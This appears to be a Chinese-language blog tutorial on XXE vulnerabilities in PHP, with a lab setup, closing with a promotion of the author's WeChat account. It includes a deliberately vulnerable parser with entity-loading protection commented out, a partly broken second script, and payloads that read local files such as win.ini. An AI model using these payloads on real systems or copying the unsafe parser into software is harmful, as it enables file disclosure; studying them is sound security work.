xxe漏洞学习与实战
一、Xxe漏洞学习
Xxe是一种针对xml终端的攻击,想要实施这种攻击,需要在xml的payload包含外部实体声明,且服务器本身允许实体扩展。这样就能读取web服务器文件系统,通过unc路径访问远程文件,或者http/https连接主机。
Jiexi.php
<?php
header("content-type:text/html;charset=utf-8");
//libxml_disable_entity_loader(true);
$str = @file_get_contents('php://input');
$xml = simplexml_load_string($str,'SimpleXMLElement', LIBXML_NOCDATA);
echo "<pre>";
var_dump($xml);
?>
Book.xml
<books>
<book>
<author>Jack Herrington</author>
<title>PHP Hacks</title>
<publisher>O'Reilly</publisher>
</book>
<book>
<author>Jack Herrington</author>
<title>Podcasting Hacks</title>
<publisher>O'Reilly</publisher>
</book>
</books>
<?php
$doc = new DOMDocument('1.0', 'utf8');
$doc = @file_get_contents('php://input');
$xml = simplexml_load_string($doc);
echo "<pre>";
var_dump($xml)
//$doc->load( 'books.xml' );
//echo "$doc";
//xml_set_external_entity_ref_handler($doc, "ext_ent_handler");
$doc = DOMDocument::loadXML($doc);
$books = $doc->getElementsByTagName( "book" );
foreach( $books as $book )
{
$authors = $book->getElementsByTagName( "author" );
$author = $authors->item(0)->nodeValue;
$publishers = $book->getElementsByTagName( "publisher" );
$publisher = $publishers->item(0)->nodeValue;
$titles = $book->getElementsByTagName( "title" );
$title = $titles->item(0)->nodeValue;
echo "$title - $author - $publisher\n";
echo "<br>";
}
?>
Payload
http://192.168.1.106:800/xxe/jiexi.php
<?xml version='1.0' encoding='UTF-8'?>
<students>
<student>
<name>xiaohei</name>
<age>20</age>
</student>
</students>
二、Xxe漏洞实战
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE a [<!ENTITY b SYSTEM 'file:///c:/xxx.txt'>]>
<students>
<student>
<w>&b;</w>
<name>xiaohei</name>
<age>20</age>
</student>
</students>
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE a [<!ENTITY b SYSTEM 'file:///c:/windows/win.ini'>]>
<students>
<student>
<w>&b;</w>
<name>xiaohei</name>
<age>20</age>
</student>
</students>
三、我的公众号
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗